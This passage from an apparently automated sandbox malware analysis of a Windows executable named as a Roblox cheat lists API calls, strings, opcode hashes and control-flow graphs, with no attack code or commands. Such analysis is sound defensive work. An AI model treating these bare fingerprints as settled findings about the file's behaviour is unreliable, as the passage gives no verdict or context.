3518->3517 3521 7ff6e7e2430f-7ff6e7e24314 call 7ff6e7e47904 3518->3521 3521->3509
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 474548282-0
                                                                                                                  • Opcode ID: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
                                                                                                                  • Instruction ID: 56b6637f748f7b1ceefb39fe11b0149a8950d78dee9cf489463e869a17a0b8a0
                                                                                                                  • Opcode Fuzzy Hash: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
                                                                                                                  • Instruction Fuzzy Hash: 1561B163B08B8681EA109B29E84036D7361FB867A4F505331EAFD83AD9DF3DD985C705
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: CMT
                                                                                                                  • API String ID: 0-2756464174
                                                                                                                  • Opcode ID: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
                                                                                                                  • Instruction ID: 555d93a38845fd1177c1613d7c3bfeef1deb07d51f6bb8ab7dec53fde9621d53
                                                                                                                  • Opcode Fuzzy Hash: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
                                                                                                                  • Instruction Fuzzy Hash: 3242DD23B0868297EB18DBB4C1523FD67A0AB11348F400136DBAE9769BDF3DE559C346
                                                                                                                  Similarity
                                                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3340455307-0
                                                                                                                  • Opcode ID: 9f1cbd0ae3de128b3baec150e1e4cd931595298ca254ea0b004e55239e899349
                                                                                                                  • Instruction ID: 6e91df742088199d3b45aaf69c75509688bcc4708b92477261814e5c1297ee2f
                                                                                                                  • Opcode Fuzzy Hash: 9f1cbd0ae3de128b3baec150e1e4cd931595298ca254ea0b004e55239e899349
                                                                                                                  • Instruction Fuzzy Hash: 29412623B157D786FAA4DF25E90176A2252FBC5784F044030DE9E87794DE3DE8438709

                                                                                                                  Control-flow Graph

                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                                  • API String ID: 1496594111-2013832382
                                                                                                                  • Opcode ID: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                                                                                                                  • Instruction ID: 24d26aa3dbdb766de544b8e6a3b38cedfb5a54baf1221095d68c1a4921161bd8
                                                                                                                  • Opcode Fuzzy Hash: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                                                                                                                  • Instruction Fuzzy Hash: A3324B32A09B8699EB118F20F8402E933A4FF44354F500236DAED877A5EF3EE659C345
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E28E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6E7E28F8D
                                                                                                                  • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6E7E29F75
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E2A42F
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E2A435
                                                                                                                    • Part of subcall function 00007FF6E7E30BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E7E30B44), ref: 00007FF6E7E30BE9
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                  • API String ID: 3629253777-3268106645
                                                                                                                  • Opcode ID: a0ca64e2e6ce2865254327ea7649ce479d77a76cd71c28d6026bad56dc47627e
                                                                                                                  • Instruction ID: aff57d07b275ea1e88e26f8a150b7e5e63beff869fe5c007bb282d1726d169f4
                                                                                                                  • Opcode Fuzzy Hash: a0ca64e2e6ce2865254327ea7649ce479d77a76cd71c28d6026bad56dc47627e
                                                                                                                  • Instruction Fuzzy Hash: 1362DF63B1868391EB10DB24D4443BD23A5FB40788F805532DAAEA76D5EF3EE945C34A

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1910 7ff6e7e41900-7ff6e7e41989 call 7ff6e7e41558 1913 7ff6e7e4198b-7ff6e7e419af call 7ff6e7e41868 RaiseException 1910->1913 1914 7ff6e7e419b4-7ff6e7e419d1 1910->1914 1920 7ff6e7e41bb8-7ff6e7e41bd5 1913->1920 1916 7ff6e7e419e6-7ff6e7e419ea 1914->1916 1917 7ff6e7e419d3-7ff6e7e419e4 1914->1917 1919 7ff6e7e419ed-7ff6e7e419f9 1916->1919 1917->1919 1921 7ff6e7e419fb-7ff6e7e41a0d 1919->1921 1922 7ff6e7e41a1a-7ff6e7e41a1d 1919->1922 1930 7ff6e7e41b89-7ff6e7e41b93 1921->1930 1931 7ff6e7e41a13 1921->1931 1923 7ff6e7e41ac4-7ff6e7e41acb 1922->1923 1924 7ff6e7e41a23-7ff6e7e41a26 1922->1924 1925 7ff6e7e41acd-7ff6e7e41adc 1923->1925 1926 7ff6e7e41adf-7ff6e7e41ae2 1923->1926 1927 7ff6e7e41a28-7ff6e7e41a3b 1924->1927 1928 7ff6e7e41a3d-7ff6e7e41a52 LoadLibraryExA 1924->1928 1925->1926 1932 7ff6e7e41ae8-7ff6e7e41aec 1926->1932 1933 7ff6e7e41b85 1926->1933 1927->1928 1934 7ff6e7e41aa9-7ff6e7e41ab2 1927->1934 1928->1934 1935 7ff6e7e41a54-7ff6e7e41a67 GetLastError 1928->1935 1940 7ff6e7e41bb0 call 7ff6e7e41868 1930->1940 1941 7ff6e7e41b95-7ff6e7e41ba6 1930->1941 1931->1922 1938 7ff6e7e41b1b-7ff6e7e41b2e GetProcAddress 1932->1938 1939 7ff6e7e41aee-7ff6e7e41af2 1932->1939 1933->1930 1944 7ff6e7e41abd 1934->1944 1945 7ff6e7e41ab4-7ff6e7e41ab7 FreeLibrary 1934->1945 1942 7ff6e7e41a69-7ff6e7e41a7c 1935->1942 1943 7ff6e7e41a7e-7ff6e7e41aa4 call 7ff6e7e41868 RaiseException 1935->1943 1938->1933 1949 7ff6e7e41b30-7ff6e7e41b43 GetLastError 1938->1949 1939->1938 1946 7ff6e7e41af4-7ff6e7e41aff 1939->1946 1952 7ff6e7e41bb5 1940->1952 1941->1940 1942->1934 1942->1943 1943->1920 1944->1923 1945->1944 1946->1938 1950 7ff6e7e41b01-7ff6e7e41b08 1946->1950 1954 7ff6e7e41b5a-7ff6e7e41b81 call 7ff6e7e41868 RaiseException call 7ff6e7e41558 1949->1954 1955 7ff6e7e41b45-7ff6e7e41b58 1949->1955 1950->1938 1957 7ff6e7e41b0a-7ff6e7e41b0f 1950->1957 1952->1920 1954->1933 1955->1933 
1955->1954 1957->1938 1960 7ff6e7e41b11-7ff6e7e41b19 1957->1960 1960->1933 1960->1938
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                                                  • String ID: H
                                                                                                                  • API String ID: 3432403771-2852464175

                                                                                                                  Control-flow Graph

                                                                                                                  [Control-flow graph omitted; API calls labelled on its nodes: ShellExecuteExW, ShowWindow, CloseHandle, GetExitCodeProcess]
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: .exe$.inf$Install$p
                                                                                                                  • API String ID: 1054546013-3607691742

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4119318379-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0

                                                                                                                  Control-flow Graph

                                                                                                                  [Control-flow graph omitted; API calls labelled on its nodes: CreateFileW, GetLastError, SetFileTime]
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3536497005-0

                                                                                                                  Control-flow Graph

                                                                                                                  [Control-flow graph omitted; API calls labelled on its nodes: SetEnvironmentVariableW]
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: sfxcmd$sfxpar
                                                                                                                  • API String ID: 3540648995-3493335439

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                                                                  • String ID: ]
                                                                                                                  • API String ID: 2347093688-3352871620

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1266772231-0

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                  • String ID: EDIT
                                                                                                                  • API String ID: 4243998846-3080729518

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite$Handle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4209713984-0

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3750147219-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2359106489-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1452418845-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2244327787-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E2ECD8: ResetEvent.KERNEL32 ref: 00007FF6E7E2ECF1
                                                                                                                    • Part of subcall function 00007FF6E7E2ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF6E7E2ED07
                                                                                                                  • ReleaseSemaphore.KERNEL32 ref: 00007FF6E7E2E974
                                                                                                                  • FindCloseChangeNotification.KERNELBASE ref: 00007FF6E7E2E993
                                                                                                                  • DeleteCriticalSection.KERNEL32 ref: 00007FF6E7E2E9AA
                                                                                                                  • CloseHandle.KERNEL32 ref: 00007FF6E7E2E9B7
                                                                                                                    • Part of subcall function 00007FF6E7E2EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E7E2E95F,?,?,?,00007FF6E7E2463A,?,?,?), ref: 00007FF6E7E2EA63
                                                                                                                    • Part of subcall function 00007FF6E7E2EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E7E2E95F,?,?,?,00007FF6E7E2463A,?,?,?), ref: 00007FF6E7E2EA6E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2143293610-0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$CreatePriority
                                                                                                                  • String ID: CreateThread failed
                                                                                                                  • API String ID: 2610526550-3849766595
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: DirectoryInitializeMallocSystem
                                                                                                                  • String ID: riched20.dll
                                                                                                                  • API String ID: 174490985-3360196438
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E3853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6E7E3856C
                                                                                                                    • Part of subcall function 00007FF6E7E2AAE0: LoadStringW.USER32 ref: 00007FF6E7E2AB67
                                                                                                                    • Part of subcall function 00007FF6E7E2AAE0: LoadStringW.USER32 ref: 00007FF6E7E2AB80
                                                                                                                    • Part of subcall function 00007FF6E7E11FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E11FFB
                                                                                                                    • Part of subcall function 00007FF6E7E1129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6E7E11396
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E401BB
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E401C1
                                                                                                                  • SendDlgItemMessageW.USER32 ref: 00007FF6E7E401F2
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3106221260-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2272807158-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2176759853-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1875163511-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1203560049-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3118131910-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1203560049-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1703294689-0
                                                                                                                  APIs
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E1F895
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E1F89B
                                                                                                                    • Part of subcall function 00007FF6E7E23EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6E7E30811), ref: 00007FF6E7E23EFD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3587649625-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6E7E2274D), ref: 00007FF6E7E228A9
                                                                                                                  • GetLastError.KERNEL32(?,00007FF6E7E2274D), ref: 00007FF6E7E228B8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2976181284-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1746051919-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: File$BuffersFlushTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1392018926-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2948472770-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2976181284-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$RectText$ClientWindowswprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 402765569-0
                                                                                                                  • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                                                  • Instruction ID: e518abbeafb2c6c8a084ad26ed748940285b6bf35fffe4c059bddfb3ab8b4e03
                                                                                                                  • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                                                  • Instruction Fuzzy Hash: 00011E22B0928F43FF599752E8A937957956F85744F084035D8ED862DADE2EE888830B
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6E7E2EBAD,?,?,?,?,00007FF6E7E25752,?,?,?,00007FF6E7E256DE), ref: 00007FF6E7E2EB5C
                                                                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF6E7E2EB6F
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1231390398-0
                                                                                                                  • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                                                  • Instruction ID: adde685787dfdde87cf56e04e2137dc760a6d09110fbde23c039347668500991
                                                                                                                  • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                                                  • Instruction Fuzzy Hash: 6BE02B62F1458B42DF188F65D4446E973D2BFC8B40F848135E64BC3614DE2DE5458B41
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1173176844-0
                                                                                                                  • Opcode ID: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                                                                                                                  • Instruction ID: a97026dbf0591b5513f78628f661dc78aa694a7164e8105317efdf1ca3eaad49
                                                                                                                  • Opcode Fuzzy Hash: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                                                                                                                  • Instruction Fuzzy Hash: 72E0EC42E1910742FD5863719C263B800680F59370E581730DAFED92C2FE1EA9A7A11E
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 588628887-0
                                                                                                                  • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                                                  • Instruction ID: 3075991e98cfe1199a5714d7e7aaca26fb1767de8ce84545e02d6e3425d02128
                                                                                                                  • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                                                  • Instruction Fuzzy Hash: 4DE08652E0D54386FF05EBB3F80537413D15F94750B040030CBADC6252FE3E9482920A
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: 8948bb9802c6c0987d886fae829bf96634841c4c74bd64b8e97cfea881f89bd5
                                                                                                                  • Instruction ID: 043d8b26f7b6fe629ce49a55448a9867175c52071265e9d54f2031d5aeae5ec0
                                                                                                                  • Opcode Fuzzy Hash: 8948bb9802c6c0987d886fae829bf96634841c4c74bd64b8e97cfea881f89bd5
                                                                                                                  • Instruction Fuzzy Hash: F6D1A463B0868696EB28CB25D5413BD7BA5FB05B84F040035CBBD877A5CF3EE4698706
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1017591355-0
                                                                                                                  • Opcode ID: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
                                                                                                                  • Instruction ID: 7eb34151d9d186fe65c91c7284deb527146b3d79de1e3095738d61bc142767f0
                                                                                                                  • Opcode Fuzzy Hash: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
                                                                                                                  • Instruction Fuzzy Hash: 1E61F713E0C6C781FA649B15CA1437A9291AF41BD0F245171EEEEC76C9FE7EE441A20B
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E2E948: ReleaseSemaphore.KERNEL32 ref: 00007FF6E7E2E974
                                                                                                                    • Part of subcall function 00007FF6E7E2E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF6E7E2E993
                                                                                                                    • Part of subcall function 00007FF6E7E2E948: DeleteCriticalSection.KERNEL32 ref: 00007FF6E7E2E9AA
                                                                                                                    • Part of subcall function 00007FF6E7E2E948: CloseHandle.KERNEL32 ref: 00007FF6E7E2E9B7
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E31ACB
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1624603282-0
                                                                                                                  • Opcode ID: 706733c944098cb8a605eaf932642e2f84c02d8e7386b9a1576d55af7d044be2
                                                                                                                  • Instruction ID: 9c1fe89c25a8f9a81fd439bc1b7abf0058c1647258c7f77e7463f2faab16848c
                                                                                                                  • Opcode Fuzzy Hash: 706733c944098cb8a605eaf932642e2f84c02d8e7386b9a1576d55af7d044be2
                                                                                                                  • Instruction Fuzzy Hash: 0661C063B16A85A2EE08CB65D5482BC7365FF40F90B144136D7BD8BAD1DF3EE4618309
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: 89b76225f611734f1827ebf27dd46062ec279a58f062f7148514824cdf62f394
